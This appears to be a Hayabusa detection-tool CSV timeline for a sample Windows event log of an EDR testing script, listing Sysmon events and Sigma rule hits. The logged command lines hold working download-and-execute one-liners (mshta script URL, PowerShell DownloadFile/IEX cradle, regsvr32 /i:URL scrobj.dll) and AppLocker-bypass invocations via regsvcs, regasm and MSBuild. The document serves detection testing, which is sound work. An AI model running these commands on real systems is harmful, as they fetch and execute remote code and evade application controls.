javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 
+09:00,MSEDGEWIN10,1,high,Evas,Mshta JavaScript Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 404 | PGUID: 747F3D96-6620-5D3F-0000-0010C7798700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49826 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49827 (MSEDGEWIN10.home) | Dst: 93.184.220.29:80 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT 
AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1356 | PGUID: 747F3D96-6621-5D3F-0000-001071D28700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5816 | PGUID: 747F3D96-6623-5D3F-0000-001011F68700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6156 | PGUID: 747F3D96-6623-5D3F-0000-0010CBF78700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""(New-Object 
Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,PowerShell Download from URL,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in 
CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:24.104 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 1176 | PGUID: 747F3D96-6624-5D3F-0000-0010E8358800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49828 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 
747F3D96-6623-5D3F-0000-0010BC068800,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1296 | PGUID: 747F3D96-6628-5D3F-0000-001067768800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2040 | PGUID: 747F3D96-6628-5D3F-0000-001062788800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 
Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | LID: 0x413182 | PID: 4860 | PGUID: 747F3D96-6628-5D3F-0000-00105B918800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5708 | PGUID: 747F3D96-6628-5D3F-0000-0010B1968800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6552 | PGUID: 747F3D96-6628-5D3F-0000-0010349B8800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4564 | PGUID: 747F3D96-6629-5D3F-0000-0010C0BE8800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-662E-5D3F-0000-001011038900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 
Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1976 | PGUID: 747F3D96-662E-5D3F-0000-0010C2048900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2604 | PGUID: 747F3D96-662E-5D3F-0000-001054068900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4092 | PGUID: 
747F3D96-6633-5D3F-0000-001051608900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6633-5D3F-0000-001092628900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6633-5D3F-0000-0010F0638900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | LID: 0x413182 | PID: 3512 | PGUID: 747F3D96-6633-5D3F-0000-0010D9778900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1652 | PGUID: 747F3D96-6638-5D3F-0000-00103DA88900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4632 | PGUID: 747F3D96-6638-5D3F-0000-001022AA8900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: 
C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 208 | PGUID: 747F3D96-6639-5D3F-0000-001074F48900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49829 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 4288 | PGUID: 
747F3D96-6638-5D3F-0000-001067BA8900,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.340 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3240 | PGUID: 747F3D96-663D-5D3F-0000-00106F608A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 
747F3D96-663D-5D3F-0000-001074658A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | LID: 0x413182 | PID: 5340 | PGUID: 747F3D96-663D-5D3F-0000-001062708A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 